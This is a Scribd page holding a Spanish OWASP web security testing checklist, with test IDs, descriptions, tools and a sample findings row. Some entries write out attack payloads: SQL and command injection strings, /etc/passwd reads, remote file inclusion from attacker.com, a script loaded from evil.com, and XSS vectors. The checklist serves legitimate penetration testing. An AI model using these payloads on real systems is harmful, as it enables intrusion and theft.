Scribd
Cargar
109 vistas

Controles OWASP

Este documento presenta una lista de comprobación de pruebas OWASP (Open Web Application Security Project) para evaluar la seguridad de una aplicación web. Incluye pruebas para la recolección de información, configuración y despliegue, gestión de identidad, autenticación, autorización, sesiones, validación de datos, manejo de errores, criptografía, lógica empresarial, cliente y herramientas para realizar dichas pruebas.

Cargado por

rebeca sisalima
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como XLSX, PDF, TXT o lee en línea desde Scribd
109 vistas

Controles OWASP

Este documento presenta una lista de comprobación de pruebas OWASP (Open Web Application Security Project) para evaluar la seguridad de una aplicación web. Incluye pruebas para la recolección de información, configuración y despliegue, gestión de identidad, autenticación, autorización, sesiones, validación de datos, manejo de errores, criptografía, lógica empresarial, cliente y herramientas para realizar dichas pruebas.

Cargado por

rebeca sisalima
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como XLSX, PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 23

OWASP: Testing Guide v4 Lista de Comprobación

Recolección de Información Prueba (control)


Llevar a cabo un reconocimiento para el descubrimiento y
OTG-INFO-001
búsqueda de fuga de información

OTG-INFO-002 Fingerprint Servidor Web

Revisar los metaficheros del servidor web en busca de fugas


OTG-INFO-003
de información

OTG-INFO-004 Enumerar las aplicaciones en el servidor web

Revisar los comentarios de la página web y los metadatos para


OTG-INFO-005
detectar fugas de información

OTG-INFO-006 Identificar los puntos de entrada de la aplicación

OTG-INFO-007 Trazar las rutas de ejecución de la aplicación

OTG-INFO-008 Fingerprintting del Framework de la aplicación Web

OTG-INFO-009 Fingerprintting de la aplicación Web

OTG-INFO-010 Mapeo de la arquitectura de la aplicación

Pruebas de gestión de
Prueba (control)
configuración y despliegue

OTG-CONFIG-001 Probar la configuración de la red/infraestructura

OTG-CONFIG-002 Probar la configuración de la plataforma de la aplicación

Probar Manejo de extensiones de archivos para información


OTG-CONFIG-003
sensible

Copias de seguridad y archivos no referenciados para


OTG-CONFIG-004
información sensible

Enumerar la infraestructura y las interfaces de administración


OTG-CONFIG-005
de las aplicaciones

OTG-CONFIG-006 Pruebe los métodos HTTP

OTG-CONFIG-007 Probar la seguridad de HTTP


OTG-CONFIG-008 Pruebe la política de dominio cruzado RIA

Pruebas de gestión de identidad Prueba (control)

OTG-IDENT-001 Pruuebas de roeles definidos

OTG-IDENT-002 Probar el proceso de registro del usuario

OTG-IDENT-003 Pruebas de los procesos de aprovisionamiento de cuentas

Prueba de enumeraciones de cuentas y adivinación de cuentas


OTG-IDENT-004
de usuario.

Pruebas de nombres de usuario débil y piliticas de nombre


OTG-IDENT-005
débilies

OTG-IDENT-006 Pruabas de permisos de cuentas de huéspedes/entrenamiento

OTG-IDENT-007 Prueba del proceso de suspensión y reanudación de cuentas

Prueba de la autenticación Prueba (control)

OTG-AUTHN-001 Prueba de credenciales transportadas por un canal encriptado

OTG-AUTHN-002 Prueba de credenciales por defecto

OTG-AUTHN-003 Prubas de mecanismos de bloqueo débiles

OTG-AUTHN-004 Pruebas para evitar el esquema de autenticación

OTG-AUTHN-005 Pruebe la funcionalidad de recordar contraseña

OTG-AUTHN-006 Prueba de la debilidad de la memoria caché del navegador

OTG-AUTHN-007 Prueba de la política de contraseñas débiles


OTG-AUTHN-008 Prueba de pregunta/respuesta de seguridad débilés

Prueba de las funciones de cambio o restablecimiento de


OTG-AUTHN-009
contraseñas débiles

OTG-AUTHN-010 Prueba de autenticación débiles en un canal alternativo

Pruebas de la autotización Prueba (control)


OTG-AUTHZ-001 Pruebas de Directory traversal/file inclusion

OTG-AUTHZ-002 Pruebas para eludir el esquema de autorización

OTG-AUTHZ-003 Pruebas de escalada de privilegios

OTG-AUTHZ-004 Pruebas de referencias de objetos directos inseguros

Prubas de gestión de sesiones Prueba (control)


OTG-SESS-001 Pruebas para eludir el esquema de gestión de sesiones

OTG-SESS-002 Prueba de los atributos de las cookies

OTG-SESS-003 Pruebas para la fijación de la sesión (Session Fixation)

OTG-SESS-004 Pruebas de las variables de sesión expuestas

OTG-SESS-005 Pruebas de Cross Site Request Forgery

OTG-SESS-006 Prueba de la funcionalidad de cierre de sesión

OTG-SESS-007 Prueba sessu¡ion Timeout

OTG-SESS-008 Pruebas de Session puzzling

Data Validation Testing Prueba (control)


OTG-INPVAL-001 Pruebas de Reflected Cross Site Scripting

OTG-INPVAL-002 Pruebas de Stored Cross Site Scripting

OTG-INPVAL-003 Pruebas de HTTP Verb Tampering

OTG-INPVAL-004 Pruebas de HTTP Parameter pollution

OTG-INPVAL-005 Pruebas de SQL Injection


Oracle

MySQL

SQL Server

PostgreSQL

MS Access T

Pruebas de NoSQL injection

OTG-INPVAL-006 Pruebas de LDAP Injection

OTG-INPVAL-007 Pruebas de ORM Injection


OTG-INPVAL-008 Pruebas de XML Injection

OTG-INPVAL-009 Pruebas de SSI Injection

OTG-INPVAL-010 Pruebas de XPath Injection

OTG-INPVAL-011 Pruebas de IMAP/SMTP Injection

OTG-INPVAL-012 Pruebas de Code Injection

Pruebas de Local File Inclusion

Pruebas de Remote File Inclusion

OTG-INPVAL-013 Pruebas de Command Injection

OTG-INPVAL-014 Pruebas de Buffer overflow

Pruebas de Heap overflow


Pruebas de Stack overflow
Pruebas de Format string
OTG-INPVAL-015 Testing for incubated vulnerabilities

OTG-INPVAL-016 Testing for HTTP Splitting/Smuggling


Manejo de errores Prueba (control)

OTG-ERR-001 Analisis de códigos de error

OTG-ERR-002 Análisis de Stack Traces

Cryptography Prueba (control)


Pruebas de cifrado SSL/TSL débiles, protección insuficiente de
OTG-CRYPST-001
la capa de transporte

OTG-CRYPST-002 Pruebas de Padding Oracle

Pruebas de información sensible enviada a través de canales


OTG-CRYPST-003
no encriptados

Pruebas de la Lógica de Negocio Prueba (control)

OTG-BUSLOGIC-001 Prueba de la logica de validación de datos

OTG-BUSLOGIC-002 Prueba de capacidad para falsificar peticiones HTTP

OTG-BUSLOGIC-003 Prueba de los controles de integridad

OTG-BUSLOGIC-004 Prueba de tiempo de proceso


OTG-BUSLOGIC-005 Prueba número límite de veces que se puede usar una función

OTG-BUSLOGIC-006 Pruebas de evasión de los flujos de trabajo

OTG-BUSLOGIC-007 Prueba de las defensas contra el mal uso de la aplicación

OTG-BUSLOGIC-008 Pruebas de carga de tipos de archivos inesperados

OTG-BUSLOGIC-009 Pruebas de carga de archivos maliciosos

Prubas del cliente Prueba (control)


OTG-CLIENT-001 Pruebas de DOM based Cross Site Scripting

OTG-CLIENT-002 Pruebas de JavaScript Execution

OTG-CLIENT-003 Pruebas de HTML Injection

OTG-CLIENT-004 Pruebas de Client Side URL Redirect

OTG-CLIENT-005 Pruebas de CSS Injection

OTG-CLIENT-006 Pruebas de Client Side Resource Manipulation

OTG-CLIENT-007 Pruebas de Cross Origin Resource Sharing

OTG-CLIENT-008 Pruebas de Cross Site Flashing

OTG-CLIENT-009 Pruebas de Clickjacking

OTG-CLIENT-010 Pruebas de WebSockets


OTG-CLIENT-011 Pruebas de Web Messaging

OTG-CLIENT-012 Pruebas de almacenamiento local

No Iniciada
Aprobado
Vulnerable
N/A
Descripción Herramienta
Utiliza un motor de búsqueda para buscar diagramas de red y Google Hacking, Sitedigger,
configuraciones, credenciales, contenido de mensajes de error. Shodan, FOCA, Punkspider
Encuentrar la versión y el tipo del servidor web en funcionamiento para
determinar las vulnerabilidades conocidas y los exploits apropiados. Usando Httprint, Httprecon,
"HTTP header field ordering" y "Malformed requests test". Desenmascarame
Analice el robots.txt e identifique <META> Etiquetas del sitio web.
Browser, curl, wget
Encontrar aplicaciones alojadas en el servidor web (Anfitriones Webhosting.info, dnsrecon, Nmap,
virtuales/Subdominio), puertos no estándar, transferencias de zonas DNS
fierce, Recon-ng, Intrigue
Encuentra información sensible en los comentarios de las páginas web y en
los metadatos del código fuente. Browser, curl, wget
Identificar de campos ocultos, parámetros, métodos de análisis de cabecera Burp proxy, ZAP, Tamper data,
HTTP Webinspect, Acunnetix
Mapear la aplicación de destino y entender los principales flujos de trabajo. Burp proxy, ZAP, Webinspect,
Acunnetix
Identificar el Framework de la aplicación web/CMS a partir de los
encabezados HTTP, Cookies, Código fuente, Archivos y carpetas específicas. Whatweb, BlindElephant,
Wappalyzer

Identificar la aplicación web y la versión para determinar las vulnerabilidades Whatweb, BlindElephant,
conocidas y los exploits apropiados. Wappalyzer, CMSmap
Identificar la arquitectura de la aplicación incluyendo el lenguaje Web, WAF,
Proxy inverso, Servidor de Aplicación, Base de datos de Backend Browser, curl, wget

Descripción
Herramienta
Comprender las interacciones de los elementos de la infraestructura, la
gestión de la configuración de los programas, el servidor de bases de datos
del backend, WebDAV, FTP, etc. para identificar las vulnerabilidades Nessus
conocidas.

Identificar el archivo/directorio de instalación predeterminado, manejar los


errores del servidor (40*,50*), privilegios mínimos, registro del software. Browser, Nikto

Encontrar archivos importantes, información (.asa , .inc , .sql ,zip, tar, pdf, txt,
etc) Browser, Nikto

Revisa el código fuente de JS, los comentarios, el archivo de caché, el archivo


de respaldo (.old, .bak, .inc, .src) y adivinar el nombre del archivo. Nessus, Nikto, Wikto

Enumeración de directorios y de archivos, comentarios y enlaces (/admin,


/administrador, /backoffice, /backend, etc.), puerto de servidor alternativo Burp Proxy, dirb, Dirbuster, fuzzdb,
(Tomcat/8080) Tilde Scanner

Identificar los métodos HTTP permitidos en el servidor web con OPTIONS.


Métodos arbitrarios de HTTP, bypass de control de acceso HEAD y XST
netcat, curl

Identificar el encabezado HSTS en el servidor web a través del encabezado


HTTP de la respuesta . Burp Proxy, ZAP, curl, ,
curl -s -D- https://domain.com/ | grep Strict Webinspect, Acunnetix
Analizar en la política los permisos permitidos de los archivos
(crossdomain.xml/clientaccesspolicy.xml) y y desde donde se pernite el Burp Proxy, ZAP, Nikto, ,
acceso Webinspect, Acunnetix

Descripción
Herramienta
Validar los roles definidos en el sistema dentro de la aplicación creando una
matriz de permisos. Burp Proxy, ZAP, , Webinspect,
Acunnetix
Verificar que los requisitos de identidad para el registro de usuarios estén
alineados con los requisitos comerciales y de seguridad.
Burp Proxy, ZAP, , Webinspect,
Acunnetix
Determinar qué roles son capaces de provisionar usuarios y qué tipo de
cuentas que pueden provisionar.
Burp Proxy, ZAP, , Webinspect,
Acunnetix
Comprobación de la declaración de error de inicio de sesión, códigos de
retorno/valores de parámetros, enumerar todas las posibles identificaciones Browser, Burp Proxy, ZAP,
de usuario válidas (Sistema de inicio de sesión, Contraseña olvidada) Webinspect, Acunnetix

Los nombres de las cuentas de usuario suelen ser muy estructurados (por
ejemplo, Antonio García, el nombre de la cuenta es jgarcia). Por lo tanto Browser, Burp Proxy, ZAP,
nombres válidos de las cuentas pueden ser fácilmente adivinados.
Webinspect, Acunnetix

Las cuentas de invitado y de formación son formas útiles de familiarizar a los


posibles usuarios con la funcionalidad del sistema antes de que completen el
proceso de autorización necesario para el acceso. Evaluar la coherencia entre Burp Proxy, ZAP, Webinspect,
la política de acceso y los permisos de acceso de las cuentas de invitado y de Acunnetix
formación.
Verificar que los requisitos de identidad para el registro de usuarios se ajusten
a los requisitos comerciales y de seguridad. Validar el proceso de registro. Burp Proxy, ZAP, Webinspect,
Acunnetix

Descripción Herramienta
Verifique el remitente si su HTTP o HTTPs. Enviar datos a través de HTTP y Burp Proxy, ZAP, Webinspect,
HTTPS.
Acunnetix
Comprobar las credenciales por defecto de las aplicaciones comunes,
Comprobar la contraseña por defecto de las nuevas cuentas. Burp Proxy, ZAP, Hydra

Evaluar la capacidad del mecanismo de bloqueo de cuentas para mitigar


la adivinación de contraseña por fuerza bruta. Evaluar la resistencia del Browser
mecanismo de desbloqueo para desbloquear cuentas no autorizadas.

Forzar la navegación (/admin/main.php, /page.asp?authenticated=yes), Burp Proxy, ZAP, Webinspect,


modificación de parámetros, predicción de ID de sesión, inyección SQL Acunnetix
Busca las contraseñas que están siendo almacenadas en cookie. Examine las
cookies almacenadas por la aplicación. Verifica que las credenciales no se Burp Proxy, ZAP, Webinspect,
almacenan en texto claro, sino que son "hash". ¿Autocompletado=off?
Acunnetix

Comprueba el historial del navegador haciendo clic en el botón "Atrás"


después de cerrar la sesión. Comprobar el problema de la caché del Burp Proxy, ZAP, Firefox add-on
navegador desde las cabeceras de respuesta HTTP (Cache-Control: no- CacheViewer2
cache)
Determinar la resistencia de la aplicación contra intentos de adivinar la
contraseña por fuerza bruta usando los diccionarios de contraseñas
disponibles, evaluando la longitud, complejidad, reutilización y requisitos de Burp Proxy, ZAP, Hydra
envejecimiento de contraseñas.
Prueba de preguntas pre-generadas débiles, prueba de preguntas auto-
generadas débiles, prueba de respuestas de fuerza bruta (¿Intentos
ilimitados?) Browser

Prueba de restablecimiento de contraseña (¿Mostrar la contraseña antigua en


texto plano?, ¿Enviar por correo electrónico?, ¿Ficha aleatoria en el correo
electrónico de confirmación?), Prueba de cambio de contraseña (¿Necesita la Browser, Burp Proxy, ZAP
contraseña antigua?), ¿Vulnerabilidad de CSRF?

Comprender el mecanismo primario e identificar otros canales (Mobile App,


Call center, SSO) Browser

Descripción Herramienta
dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Burp Proxy, ZAP, Wfuzz,
Inclusion. Webinspect, Acunnetix
¿Acceder a un recurso sin autenticación?, Evitar ACL, Forzar la navegación
(/admin/adduser.jsp)e without authentication?, Bypass ACL, Force browsing Burp Proxy (Autorize), ZAP,
(/admin/adduser.jsp) Webinspect, Acunnetix
Las pruebas de rol/privilegio que manipulan los valores de las variables Burp Proxy (Autorize), ZAP,
ocultas. Cambiar algunos param groupid=2 a groupid=1 Webinspect, Acunnetix
Forzar el cambio del valor del parámetro (?invoice=123 -> ?invoice=456) Burp Proxy (Autorize), ZAP,
Webinspect, Acunnetix

Descripción Herramienta
Pruba de predicción y análisis de la identificación de sesión (Session ID), Burp Proxy, ForceSSL, ZAP,
transporte de cookies sin cifrar, fuerza bruta. CookieDigger
Revisar HTTPOnly y el flag de segruidad, expiración, inspeccionar datos
Burp Proxy, ZAP, Webinspect,
sensibles.
Acunnetix
La aplicación no renueva la cookie después de una autenticación de usuario
exitosa. Burp Proxy, ZAP
Cifrado y reutilización de la sesión. Vulnerabilidades de los tokens, enviar el Burp Proxy, ZAP, Webinspect,
sessionID con el método GET... Acunnetix
Análisis de URL, Acceso directo a funciones sin ningún tipo de token. Burp Proxy (csrf_token_detect),
burpy, ZAP
Comprobar la reutilización de la sesión después de cerrar la sesión tanto del Burp Proxy, ZAP, Webinspect,
lado del servidor como del SSO. Acunnetix
Revisar el tiempo de espera de la sesión (timeout), después de que el tiempo
de espera haya pasado, todos lostokns de la sesión deben ser destruidos o Burp Proxy, ZAP, Webinspect,
ser inutilizados. Acunnetix
La aplicación utiliza la misma variable de sesión para más de un propósito. Un
atacante puede acceder potencialmente a las páginas en un orden no previsto Burp Proxy, ZAP, Webinspect,
por los desarrolladores, de modo que la variable de sesión se establece en un Acunnetix
contexto y luego se utiliza en otro.

Descripción Herramienta
Comprobar la validación de la entrada, Reemplazar el vector utilizado para
identificar XSS, XSS with HTTP Parameter Pollution. Burp Proxy, ZAP, Xenotix XSS
Revisar los formularios de entrada/subir y analizar HTML codes, Leverage Burp Proxy, ZAP, BeEF, XSS
XSS con BeEF Proxy
Crear solicitudes HTTP personalizadas para probar métodos para evitar la
autenticación y autorización de URL. netcat
Identificar cualquier forma o acción que permita a la entrada suministrada por
el usuario eludir la validación y los filtros de entrada utilizando HPP ZAP, HPP Finder (Chrome Plugin)
Unión, Booleana, Basada en el error, Fuera de la banda, Retraso de tiempo. Burp Proxy (SQLipy), SQLMap,
Pangolin, Seclists (FuzzDB)
Identificar URLs para aplicaciones web PL/SQL, Acceso con paquetes
PL/SQL, Bypass de la lista de exclusión PL/SQL, Inyección SQL Orascan, SQLInjector

Identificar la versión de MySQL, Cita simple, Information_schema, archivo de


lectura/escritura. SQLMap, Mysqloit, Power Injector
Operador de comentario (- -), Separador de consulta (;), Procedimientos
almacenados (xp_cmdshell) SQLMap, SQLninja, Power Injector
Determine que el motor de la base de datos del backend es PostgreSQL
usando el operador cast :: Archivo de lectura/escritura, Shell injection
(comando OS)
SQLMap, Webinspect, Acunnetix

Enumerar la columna a través de error (Group byr), Obtener esquema de SQLMap, Webinspect, Acunnetix,
base de datos combinado con fuzzdb. fuzzdb
Identificar bases de datos NoSQL, Pasar caracteres especiales (' " \ ; { } ),
Atacar con nombre de variable reservado, operador. NoSQLMap
/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=* Burp Proxy, ZAP, Webinspect,
pass=password Acunnetix
La prueba de la inyección ORM es idéntica a la prueba de la inyección SQL Hibernate, Nhibernate
Comprobar con XML Meta Characters Burp Proxy, ZAP, Wfuzz,
', " , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG Webinspect, Acunnetix
• Presencia de la .shtml extension
• Comprobar estos cracteres Burp Proxy, ZAP, Webinspect,
< ! # = / . " - > and [a-zA-Z0-9] Acunnetix
• include String = <!--#include virtual="/etc/passwd" -->
Compruebe la enumeración de errores XML suministrando una sola comilla (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1 Burp Proxy, ZAP, Webinspect,
Acunnetix

• Identificar parémetros vulnerables con caracteres especiales:


(i.e.: \, ‘, “, @, #, !, |) Burp Proxy, ZAP, Webinspect,
• Comprender el flujo de datos y la estructura de despliegue del cliente Acunnetix
• IMAP/SMTP command injection (Header, Body, Footer)
Introduzca los comandos del sistema operativo en el campo de entrada.
?arg=1; system('id') Burp Proxy, ZAP, Liffy, Panoptic
LFI con dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-
encode/resource) Burp Proxy, fimap, Liffy
RFI desde una URL maliciossa
?page.php?file=http://attacker.com/malicious_page Burp Proxy, fimap, Liffy

Comprender la plataforma de aplicación, el sistema operativo, la estructura de


carpetas, la ruta relativa y ejecutar los comandos del sistema operativo del
servidor web. Burp Proxy, ZAP, Commix,
%3Bcat%20/etc/passwd Webinspect, Acunnetix
test.pdf+|+Dir C:\
Pruebas de buffer overflow Immunity Canvas, Spike, MSF,
Nessus
Pruebas de heap overflow vulnerability
Pruebas de stack overflow vulnerability
Prubas de format string
Sufida de ficheros, XSS almacenados, SQL/XPATH Injection, errores de
configuración servidores (Tomcat, Plesk, Cpanel) Burp Proxy, BeEF, MSF
param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/
1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-
Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html> Burp Proxy, ZAP, netcat,
Webinspect, Acunnetix
Descripción Herramienta
Localizar los códigos de error generados por las aplicaciones o los servidores
web. Recopilar información sensible de esos errores (Servidor Web, Servidor Burp Proxy, ZAP, Webinspect,
de Aplicación, Base de Datos) Acunnetix
- Entradas inválidas / Entradas vacías
- Entrada que contiene caracteres no alfanuméricos en la sintaxis de consulta
- Acceso a páginas internas sin autenticación Burp Proxy, ZAP, Webinspect,
- Bypassing de los flujos de la aplicación Acunnetix

Descripción Herramienta
Identificar el servicio SSL, Identificar los cifrados/protocolos débiles (por
ejemplo, RC4, BEAST, CRIME, POODLE) testssl.sh, SSL Breacher
Compare las respuestas en tres estados diferentes:
- El texto cifrado se descifra, los datos resultantes son correctos.
- El texto cifrado se descifra, los datos resultantes son confusos y causan PadBuster, Poracle, python-
alguna excepción o manejo de errores en la lógica de la aplicación. paddingoracle, POET
- El descifrado del texto cifrado falla debido a errores de relleno

Compruebe los datos sensibles durante la transmisión:


- La información utilizada en la autenticación (por ejemplo, Credenciales, PIN,
Identificadorees de Sesión, Tokens, Cookies...) Burp Proxy, ZAP, Curl,
- La información protegida por leyes, reglamentos o por una organización Webinspect, Acunnetix
específica (por ejemplo, tarjetas de crédito, datos de los clientes)

Descripción
Herramienta
• Buscar puntos de entrada o manipulación de datos o puntos entre sistemas
o software. Burp Proxy, ZAP, Webinspect,
- Una vez encontrados, intente insertar datos lógicamente inválidos en la Acunnetix
aplicación/sistema.
• Buscar la funcionalidad adivinable, predecible u oculta de los campos.
- Una vez encontrados, intente insertar datos lógicamente válidos en la Burp Proxy, ZAP, Webinspect,
aplicación/sistema permitiendo al usuario ir a través de la misma en contra el Acunnetix
flujo de trabajo normal de la lógica de negocio.

•Buscar partes de la aplicación/sistema (componentes, por ejemplo, campos


de entrada, bases de datos o registros) que muevan, almacenen o manejen
datos/información.
- Para cada componente identificado determinar qué tipo de datos/información
que es lógicamente aceptable y contra qué tipos debe proteger la
aplicación/sistema. También considere quién, de acuerdo con la lógica de
negocio, está autorizado a insertar, actualizar y borrar datos/información y en Burp Proxy, ZAP, Webinspect,
cada componente. Acunnetix
- Intente insertar, actualizar o editar los valores de datos/información con
datos/información no válidos en cada componente (es decir, entrada, base de
datos o registro) por parte de los usuarios que .no deben ser permitidos por el
flujo de trabajo de la lógica de negocio..

• Buscar la funcionalidad de la aplicación/sistema que puede ser impactada


por el tiempo. Como el tiempo de ejecución o las acciones que ayudan a los
usuarios a predecir un resultado futuro o que le permiten a uno sortear
cualquier parte de la lógica o el flujo de trabajo del negocio. Por ejemplo, no Burp Proxy, ZAP, Webinspect,
completar las transacciones en el tiempo previsto. Acunnetix
- Desarrollar y ejecutar los casos de uso indebido asegurándose de que los
atacantes no puedan obtener una ventaja basada en cualquier tiempo.
• Buscar funciones o características en la aplicación o el sistema que no
deben ejecutarse más de una vez o un número determinado de veces durante
el flujo de trabajo de la lógica de negocio
- Para cada una de las funciones y características encontradas que sólo Burp Proxy, ZAP, Webinspect,
deben ser ejecutadas una sola vez o un número especificado de veces
durante el flujo de trabajo de la lógica de negocio, desarrollar casos de Acunnetix
abuso/mal uso que puedan permitir a un usuario ejecutar más del número de
veces permitido.

• - Buscar métodos para saltar o hacer los pasos del proceso de solicitud en
un orden diferente del flujo de la lógica de negocio diseñada/intencionada.
- Para cada método desarrollar un caso de uso indebido y tratar de eludir o Burp Proxy, ZAP, Webinspect,
realizar una acción "no aceptable" según el flujo de la lógica de negocio. Acunnetix

Medidas que podrían indicar que la aplicación tiene incorporada de defansa o


pretección:
- Respuestas modificadas Burp Proxy, ZAP, Webinspect,
- Solicitudes bloqueadas Acunnetix
- Acciones que cierran la sesión de un usuario o bloquean su cuenta
•- Revise la documentación del proyecto y realice algunas pruebas
exploratorias en busca de tipos de archivo que deberían ser "no soportados"
por la aplicación/sistema.
- Intente subir estos archivos "no soportados" y verifique que sean Burp Proxy, ZAP, Webinspect,
correctamente rechazados.
- Si se pueden subir varios archivos a la vez, debe haber pruebas para
Acunnetix
verificar que cada archivo sea evaluado correctamente.
PS. archivo.phtml, shell.phPWND, SHELL~1.PHPP

• Desarrollar o adquirir un archivo "malicioso" conocido.


- Intente subir el archivo malicioso a la aplicación/sistema y verifique que sea
rechazado correctamente. Burp Proxy, ZAP, Webinspect,
- Si se pueden cargar varios archivos a la vez, deben realizarse pruebas para Acunnetix
verificar que cada archivo se evalúa correctamente.

Descripción Herramienta
Prueba de las entradas del usuario obtenidas de client-side JavaScript Burp Proxy, DOMinator
Objects
Inject JavaScript code: Burp Proxy, ZAP, Webinspect,
www.victim.com/?javascript:alert(1) Acunnetix
Enviar el codigo HTML malicioso:
?user=<img%20src='aaa'%20onerror=alert(1)> Burp Proxy, ZAP
Modificar la entrada de una URL no confiable a un sitio malicioso (Open
Redirect) Burp Proxy, ZAP, Webinspect,
?redirect=www.fake-target.site Acunnetix
Injectar código en CSS context :
• www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current;
(Opera [8,12]) Burp Proxy, ZAP
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
El Javascript externo podría ser fácilmente inyectado en el sitio web de
confianza Burp Proxy, ZAP, Webinspect,
www.victim.com/#http://evil.com/js.js Acunnetix
Revisa los encabezados del HTTP para entender cómo es el CORS
usado (Origin Header) Burp Proxy, ZAP
Descompilar, Variables indefinidas, Métodos inseguros, Incluir maliciosos FlashBang, Flare, Flasm,
SWF (http://victim/file.swf?lang=http://evil SWFScan, SWF Intruder
Descubrir si el sitio web es vulnerable cargandodolo en un iframe, crear una
página web simple que incluya un marco que contenga el objetivo. Burp Proxy, ClickjackingTool
Identificar que la aplicación está usando WebSockets inspeccionando ws:// or
wss:// URI scheme.Utiliza las herramientas de desarrollo de Google Chrome
para ver la comunicación de red WebSocket. Comprobar el origen, la Burp Proxy, Chrome, ZAP,
confidencialidad, la integridad, la autenticación, la autorización y la WebSocket Client
sanitización de entrada
Analizar el código JavaScript buscando cómo se implementa la Mensajería
Web. Cómo el sitio web está restringiendo los mensajes de un dominio no Burp Proxy, ZAP, Webinspect,
confiable y cómo se manejan los datos incluso para los dominios confiables Acunnetix
Determinar si el sitio web está almacenando datos confidenciales en el
almacén. XSS en el almacenamiento local Chrome, Firebug, Burp Proxy, ZAP
http://server/StoragePOC.html#<img src=x onerror=alert(1)>
Resultado Comentario
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

Resultado Comentario

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada

Resultado Comentario

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

Resultado Comentario

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada

No Iniciada

No Iniciada

Resultado Comentario
No Iniciada

No Iniciada

No Iniciada

No Iniciada

Resultado Comentario
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

Resultado Comentario
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada
No Iniciada
No Iniciada

No Iniciada
Resultado Comentario

No Iniciada

No Iniciada

Resultado Comentario
No Iniciada

No Iniciada

No Iniciada

Resultado Comentario

No Iniciada

No Iniciada

No Iniciada

No Iniciada
No Iniciada

No Iniciada

No Iniciada

No Iniciada

No Iniciada

Resultado Comentario
Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started

Not Started
Not Started

Not Started
No. Vulnerabilidade OTG Host/Path afectado Impact0 Probabilidad Riesgo

www.example.com/ Alto
1 SQL Injection OTG-INPVAL-005 Alto Moderada
news.php (id,page)
Recommendacione Prueba
Observation/Implication
s Evidence

xxx-1

También podría gustarte